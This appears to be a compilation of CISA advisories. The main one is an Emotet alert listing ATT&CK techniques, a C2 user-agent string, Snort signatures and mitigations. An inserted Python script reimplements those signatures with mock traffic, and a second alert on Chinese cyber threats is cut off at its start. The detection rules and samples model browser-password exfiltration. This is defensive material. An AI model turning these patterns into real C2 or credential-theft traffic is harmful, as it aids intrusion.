Original release date: October 6, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing &amp; Analysis Center (MS-ISAC).</p> <p>Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.</p> <p>To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.</p> <h3>Technical Details</h3><p>Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (<em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>], <em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>]). The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (<em>Brute Force: Password Guessing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/001/">T1110.001</a>], <em>Valid Accounts: Local Accounts</em> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1078/003/">T1078.003</a>], <em>Remote Services: SMB/Windows Admin Shares</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/002/">T1021.002</a>]).</p> <p>Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.</p> <p>Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved <code>HTTP POST</code> requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (<em>Application Layer Protocol: Web Protocols</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001/">T1071.001</a>]).</p> <p><code>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR</code></p> <p>Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (<em>Exploitation of Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210/">T1210</a>]). 
Figure 1 lays out Emotet’s use of enterprise techniques.</p> <p style="text-align: center;"><img alt="Figure 1: MITRE ATT&amp;CK enterprise techniques used by Emotet" height="526" src="https://us-cert.cisa.gov/sites/default/files/publications/Figure%201_0.png" width="679" /></p> <p class="text-align-center"><em>Figure 1: MITRE ATT&amp;CK enterprise techniques used by Emotet</em></p> <h4>Timeline of Activity</h4> <p>The following timeline identifies key Emotet activity observed in 2020.</p> <ul> <li><strong>February</strong>: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[<a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">1</a>]</li> <li><strong>July</strong>: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[<a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">2</a>]</li> <li><strong>August</strong>: <ul> <li>Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[<a href="https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/">3</a>]</li> <li>Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. 
Significant changes included: <ul> <li>Emotet delivering Qbot affiliate <code>partner01</code> as the primary payload and</li> <li>The Emotet mail sending module’s ability to deliver benign and malicious attachments.[<a href="https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return">4</a>]</li> </ul> </li> <li>CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.</li> </ul> </li> <li><strong>September</strong>: <ul> <li>Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[<a href="https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/">5</a>],[<a href="https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/">6</a>],[<a href="https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/">7</a>],[<a href="https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/">8</a>]</li> <li>Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. 
These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to “view” the documents—an action which actually enables the delivery of malware.[<a href="https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/">9</a>]</li> <li>Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain—using a spoofed identity—and attaching a malicious document to trick recipients into opening the file.[<a href="https://unit42.paloaltonetworks.com/emotet-thread-hijacking/">10</a>]</li> </ul> </li> </ul> <h3>MITRE ATT&amp;CK Techniques</h3> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0367/">Emotet</a> uses the ATT&amp;CK techniques listed in table 1.</p> <p class="italic text-align-center"><em>Table 1: Common exploit tools</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="632" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Technique</p> </th> <th scope="col" style="width: 492px;">Use</th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>OS Credential Dumping: LSASS Memory</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/001/">T1003.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed dropping password grabber modules including Mimikatz.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Remote Services: SMB/Windows Admin Shares</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/002/">T1021.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet leverages the Admin$ share for lateral movement once the local 
admin password has been brute forced.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/">T1027</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, <code>cmd.exe</code> arguments, and PowerShell scripts.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information: Software Packing </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002/">T1027.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used custom packers to protect its payloads.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Network Sniffing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040/">T1040</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed to hook network APIs to monitor network traffic.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Exfiltration Over C2 Channel </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1041/">T1041</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been seen exfiltrating system information stored within cookies sent within a <code>HTTP GET</code> request back to its command and control (C2) servers.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Windows Management Instrumentation</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1047/">T1047</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used WMI to execute <code>powershell.exe</code>.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process 
Injection: Dynamic-link Library Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/001/">T1055.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed injecting into <code>Explorer.exe</code> and other processes.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1057/">T1057</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed enumerating local processes.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: PowerShell</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001/">T1059.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used PowerShell to retrieve the malicious payload and download additional resources like Mimikatz.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: Windows Command Shell </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003/">T1059.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used <code>cmd.exe</code> to run a PowerShell script.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Command and Scripting Interpreter: Visual Basic</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/005/">T1059.005</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Valid Accounts: Local Accounts </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/003/">T1078.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 
492px;"> <p>Emotet can brute force a local admin password, then use it to facilitate lateral movement.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Account Discovery: Email Account </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1087/003/">T1087.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that can scrape email addresses from Outlook.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Brute Force: Password Guessing </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1110/001/">T1110.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed using a hard-coded list of passwords to brute force user accounts.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Email Collection: Local Email Collection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/001/">T1114.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that scrapes email data from Outlook.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious Link </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1204/001/">T1204.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has relied upon users clicking on a malicious link delivered through spearphishing.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.</p> </td> </tr> <tr> <td scope="col" 
style="text-align: left; width: 448px;"> <p><em>Exploitation of Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210/">T1210</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (<a href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010">MS17-010</a>) to achieve lateral movement and propagation.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Create or Modify System Process: Windows Service </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1543/003/">T1543.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed creating new services to maintain persistence.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed adding the downloaded payload to the <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> key to maintain persistence.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Scheduled Task/Job: Scheduled Task</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005/">T1053.005</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has maintained persistence through a scheduled task.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Unsecured Credentials: Credentials In Files</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/001/">T1552.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that 
retrieves passwords stored on a system for the current logged-on user.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003/">T1555.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed dropping browser password grabber modules.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Archive Collected Data </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1560/">T1560</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed encrypting the data it collects before sending it to the C2 server.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been delivered by phishing emails containing attachments.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been delivered by phishing emails containing links.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Non-Standard Port</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1571/">T1571</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Encrypted 
Channel: Asymmetric Cryptography</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/002/">T1573.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet is known to use RSA keys for encrypting C2 traffic.</p> </td> </tr> </tbody> </table> <h3>Detection</h3> <h4>Signatures</h4> <p>MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.</p> <p><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET 443 (msg:"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords"; content:"POST"; http_method; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; fast_pattern; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|"; http_client_body; content:!"------WebKitFormBoundary"; http_client_body; content:!"Cookie|3a|"; pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)</code></p> <p>CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. 
<strong>Note:</strong> the Uniform Resource Identifiers (URIs) matched by these rules are expected to contain a random-length, alphabetical, multi-directory string, and the activity will likely be over ports 80, 8080, or 443.</p> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-content/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-content/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:&lt;17; classtype:http-uri; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; metadata:service http;)</code></p> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-admin/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-admin/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:&lt;15; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; classtype:http-uri; metadata:service http;)</code></p> <h3>Mitigations</h3><p>CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. 
System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.</p> <ul> <li>Block email attachments commonly associated with malware (e.g., .dll and .exe).</li> <li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li> <li>Implement Group Policy Object (GPO) and firewall rules.</li> <li>Implement an antivirus program and a formalized patch management process.</li> <li>Implement filters at the email gateway, and block suspicious IP addresses at the firewall.</li> <li>Adhere to the principle of least privilege.</li> <li>Implement a Domain-based Message Authentication, Reporting &amp; Conformance (DMARC) validation system.</li> <li>Segment and segregate networks and functions.</li> <li>Limit unnecessary lateral communications.</li> <li>Disable file and printer sharing services. If these services are required, use <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">strong passwords</a> or Active Directory authentication.</li> <li>Enforce multi-factor authentication.</li> <li>Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. 
See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to suspicious or risky sites.</li> <li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).</li> <li>Scan all software downloaded from the internet prior to executing.</li> <li>Maintain situational awareness of the latest threats and implement appropriate access control lists.</li> <li>Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.</li> <li>See CISA’s Alert on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> for more information on addressing potential incidents and applying best practice incident response procedures.</li> <li>See the joint <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC Ransomware Guide</a> on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.</li> </ul> <p>For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, <a href="https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final">Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a>.</p> <h3>Resources</h3> <ul> <li><a href="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/">MS-ISAC Security Event Primer – Emotet</a></li> <li><a 
href="https://us-cert.cisa.gov/ncas/alerts/TA18-201A">CISA Alert TA18-201A – Emotet Malware</a></li> <li><a href="https://attack.mitre.org/software/S0367/">MITRE ATT&amp;CK – Emotet</a></li> <li><a href="https://attack.mitre.org/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a></li> </ul> <h3>References</h3> <ul> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">[1] Bleeping Computer: Emotet Malware Strikes U.S. Businesses with COVID-19 Spam</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">[2] Ibid.</a></li> <li><a href="https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/">[3] Security Lab: Emotet Update Increases Downloads</a></li> <li><a href="https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return">[4] Proofpoint: A Comprehensive Look at Emotet’s Summer 2020 Return</a></li> <li><a href="https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/">[5] ZDNet: France, Japan, New Zealand Warn of Sudden Spike in Emotet Attacks</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/">[6] Bleeping Computer: France Warns of Emotet Attacking Companies, Administration</a></li> <li><a href="https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/">[7] ESET: Emotet Strikes Quebec’s Department of Justice: An ESET Analysis</a></li> <li><a href="https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/">[8] ZDNet: Microsoft, Italy, and the Netherlands Warn of Increased Emotet Activity</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/">[9] Bleeping Computer: Emotet Double Blunder: Fake ‘Windows 
10 Mobile’ and Outdated Messages</a></li> <li><a href="https://unit42.paloaltonetworks.com/emotet-thread-hijacking/">[10] Palo Alto Networks: Case Study: Emotet Thread Hijacking, an Email Attack Technique</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 6, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
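The three Snort rules in the Emotet alert's Detection section above, re-expressed as plain Python matching logic so a defender can replay them over captured HTTP requests offline; this is an added example, not CISA or MS-ISAC code, and the `HttpRequest` parser, the rule labels it returns, and the sample requests (hosts, boundaries, URIs) are assumptions constructed for the demonstration.

```python
"""Matching logic of the three Emotet Snort rules quoted in the Detection section
above, re-expressed in plain Python so the same checks can be run over captured
HTTP requests offline. Added example, not CISA or MS-ISAC code; the sample
requests at the bottom are constructed, not real captures."""
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: dict   # header names lower-cased, values stripped
    body: str
    raw: str        # whole request text, for unmodified content/pcre checks


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.x request parser: request line, header block, body."""
    text = raw.decode("latin-1")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, headers, body, text)


# pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i" from the MS-ISAC rule
PASSWORD_FORM_RE = re.compile(r":?(chrome|firefox|safari|opera|ie|edge) passwords", re.I)


def sig_form_data_passwords(req: HttpRequest, dst_port: int) -> bool:
    """[CIS] Emotet C2 Traffic Using Form Data to Send Passwords: a cleartext POST
    to port 443 whose multipart form field is named '<browser> passwords'."""
    if dst_port != 443 or req.method != "POST":
        return False
    if not req.headers.get("content-type", "").startswith("multipart/form-data; boundary="):
        return False
    if 'Content-Disposition: form-data; name="' not in req.body:
        return False
    # Negated contents: real browser uploads carry a WebKit boundary, and the
    # rule also excludes any request whose payload contains "Cookie:".
    if "------WebKitFormBoundary" in req.body or "Cookie:" in req.raw:
        return False
    return PASSWORD_FORM_RE.search(req.raw) is not None


def sig_short_wp_get(req: HttpRequest, prefix: str, max_urilen: int) -> bool:
    """Shape shared by the two CISA rules: GET, urilen below max_urilen, prefix
    followed within 4 bytes by another '/' (distance:0; within:4, i.e. a 0-3
    byte directory name), and a literal 'Connection: Keep-Alive' header."""
    if req.method.upper() != "GET" or len(req.uri) >= max_urilen:
        return False
    if re.search(re.escape(prefix) + r".{0,3}/", req.uri) is None:
        return False
    return req.headers.get("connection") == "Keep-Alive"


def match_emotet_signatures(raw: bytes, dst_port: int = 80) -> list:
    """Names of the rules that fire on one captured client request."""
    req = parse_request(raw)
    hits = []
    if sig_form_data_passwords(req, dst_port):
        hits.append("CIS Emotet C2 form-data passwords")
    if sig_short_wp_get(req, "/wp-content/", 17):   # urilen:<17
        hits.append("EMOTET /wp-content/###/")
    if sig_short_wp_get(req, "/wp-admin/", 15):     # urilen:<15
        hits.append("EMOTET /wp-admin/###/")
    return hits


# Constructed sample requests as (raw bytes, destination port); not real traffic.
SAMPLES = {
    "short_wp_content_get": (
        b"GET /wp-content/Xy3/ HTTP/1.1\r\nHost: example.invalid\r\n"
        b"Connection: Keep-Alive\r\n\r\n", 8080),
    "normal_theme_asset": (   # legitimate WordPress asset: URI too long, no hit
        b"GET /wp-content/themes/site/style.css HTTP/1.1\r\nHost: example.invalid\r\n"
        b"Connection: Keep-Alive\r\n\r\n", 80),
    "form_password_post": (
        b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\n"
        b"Content-Type: multipart/form-data; boundary=abc123\r\n\r\n"
        b'--abc123\r\nContent-Disposition: form-data; name="Chrome Passwords"\r\n\r\n'
        b"url,user,pass\r\n--abc123--\r\n", 443),
    "browser_upload": (       # ordinary browser form post: WebKit boundary + Cookie
        b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\nCookie: sid=1\r\n"
        b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX\r\n\r\n"
        b'------WebKitFormBoundaryX\r\nContent-Disposition: form-data; name="f"\r\n\r\n'
        b"data\r\n------WebKitFormBoundaryX--\r\n", 443),
}

if __name__ == "__main__":
    for name, (raw, port) in SAMPLES.items():
        print(f"{name:22s} -> {match_emotet_signatures(raw, port)}")
```

The header matching is slightly more lenient than Snort's byte-exact `content` checks (header names are compared case-insensitively), so treat it as a triage filter rather than a drop-in replacement for the rules.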

AA20-275A: Potential for China Cyber Response to Heightened U.S.–China Tensions
Original release date: October 1, 2020 | Last revised: October 20, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p><em><strong>Note</strong>: on October 20, 2020, the National Security Agency (NSA) released a <a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">cybersecurity advisory</a> providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4).</em></p> <p>In light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.</p> <ol> <li><strong>Adopt a state of heightened awareness. </strong>Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.</li> <li><strong>Increase organizational vigilance.</strong> Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. 
Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.</li> <li><strong>Confirm reporting processes.</strong> Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider <a href="https://us-cert.cisa.gov/report">reporting incidents</a> to CISA to help serve as part of CISA’s early warning system (see the Contact Information section below).</li> <li><strong>Exercise organizational incident response plans.</strong> Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.</li> </ol> <h3>Technical Details</h3><h4>China Cyber Threat Profile</h4> <p>China has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The “Made in China 2025” 10-year plan outlines China’s top-level policy priorities.[<a href="https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf">1</a>],[<a href="https://fas.org/sgp/crs/row/IF10964.pdf">2</a>] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, 